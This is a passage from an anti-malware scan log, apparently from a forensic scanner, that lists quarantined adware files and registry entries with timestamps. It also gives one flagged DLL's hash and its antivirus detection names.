          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.3s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.3s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.3s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.3s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.4s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.4s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.4s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.4s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.4s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.6s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          0.6s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          0.6s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          0.6s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          0.7s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          0.7s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          0.7s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          0.8s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          0.8s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          0.8s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          0.8s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          0.9s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          0.9s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          0.9s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          0.9s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          1.0s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          1.0s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          1.0s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          1.0s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          1.1s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          1.1s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.1s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.1s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.2s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.2s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.4s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          5.9s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          6.6s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          7.0s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.5s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          7.7s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         11.6s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

   C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
      Size . . . . . . . : 358.912 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 6.2
      SHA-256  . . . . . : D6ECC08A8B80FA99A642234D66E69FB3A8266640CE0809AF5F14339AA79B9459
      Version  . . . . . : 1.0.0.27567
    > Bitdefender  . . . : Trojan.Generic.18009158
    > Kaspersky  . . . . : not-a-virus:AdWare.Win64.Agent.lkv
      Fuzzy  . . . . . . : 105.0
      Forensic Cluster
         -2.2s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -2.2s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.8s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.7s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.7s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.7s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.7s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.7s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.7s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.6s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.5s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
